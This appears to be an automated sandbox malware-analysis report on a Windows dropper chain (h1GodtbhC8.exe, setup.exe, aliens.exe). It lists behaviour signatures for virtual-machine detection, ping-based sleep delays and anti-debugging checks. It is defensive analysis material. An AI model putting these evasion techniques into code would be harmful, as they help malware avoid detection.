Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1607186572092.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\1607186588295.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modificationsShow sources
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100202D0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04F05AA0
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04F05AA0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100202D0
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5536Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe TID: 5604Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 4744Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748Thread sleep count: 31 > 30
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 3748Thread sleep time: -62000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe TID: 5688Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeFile opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeLast function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100223C0 GetLocalTime followed by cmp: cmp ecx, 01h and CTI: jl 10022474h
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_100223C0 GetLocalTime followed by cmp: cmp edx, 08h and CTI: jnle 10022474h
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E660F62 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,
Source: C:\Users\user\Desktop\h1GodtbhC8.exeCode function: 0_2_6E651C23 __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0121A534 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0123A928 FindFirstFileExA,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122B820 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_00402D09 FindFirstFileA,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_0040693B DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_004066CC FindFirstFileA,FindClose,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exeCode function: 4_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026DC704 PathFileExistsW,FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_026E1F70 FindFirstFileW,FindClose,@_RTC_CheckStackVars@8,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA7950 PathFileExistsA,_memset,_memset,_strcpy_s,_strcat_s,FindFirstFileA,_memset,_strcpy_s,_strcat_s,_strcat_s,_strcat_s,_strcat_s,PathFileExistsA,PathRemoveFileSpecA,_memset,_strlen,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exeCode function: 21_2_04FA5A90 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exeCode function: 1_2_0122DBC8 VirtualQuery,GetSystemInfo,
Source: 1E1C360C582DF797.exe, 00000015.00000003.563174149.0000000005D84000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI
Source: 1E1C360C582DF797.exe, 00000015.00000003.552028868.0000000005D11000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug 
Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551853011.0000000005D84000.00000004.00000001.sdmp | Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 1E1C360C582DF797.exe, 00000015.00000003.549908726.0000000005D11000.00000004.00000001.sdmp | Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmp | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 1E1C360C582DF797.exe, 00000015.00000003.551758159.0000000005D57000.00000004.00000001.sdmp, 1E1C360C582DF797.exe, 00000019.00000002.652027273.00000000041F0000.00000004.00000001.sdmp | Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmp | Binary or memory string: VMware Virtual disk 2.0
Source: 1E1C360C582DF797.exe, 00000019.00000002.650414355.000000000019B000.00000004.00000010.sdmp | Binary or memory string: VMware
Source: 1E1C360C582DF797.exe, 00000015.00000003.549962480.000000000415C000.00000004.00000001.sdmp | Binary or memory string: Microsoft Hyper-V Generation Counter ID
Source: 1E1C360C582DF797.exe, 00000015.00000003.551997697.0000000005D36000.00000004.00000001.sdmp | Binary or memory string: SystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDSend To OneNote 16{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: C:\Users\user\AppData\Roaming\1607186572092.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,
Hides threads from debuggers
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Thread information set: HideFromDebugger
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Process queried: DebugObjectHandle
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Process queried: DebugFlags
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E65041D OutputDebugStringA,GetLastError,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E672571 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E6780EB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_01237363 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_00404C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019E13 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E631660 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,CloseHandle,GetProcessHeap,HeapFree,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Process created: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe 'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E65FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Code function: 0_2_6E6652CE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122EEB3 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122F07B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_012384EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122ED65 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_0040825D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026EBE0B SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_026EBDF7 SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E83315 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E86CE8 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: 21_2_04E88D22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\h1GodtbhC8.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Process created: C:\Program Files (x86)\71eza90awf48\aliens.exe 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: 4_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: 1E1C360C582DF797.exe, 00000015.00000002.826957826.0000000002CD0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: 1_2_0122EBBB cpuid
Source: C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe | Code function: GetLocaleInfoW,GetNumberFormatW,
Source: C:\Program Files (x86)\71eza90awf48\aliens.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe | Code function: GetLocaleInfoA,_strncpy,
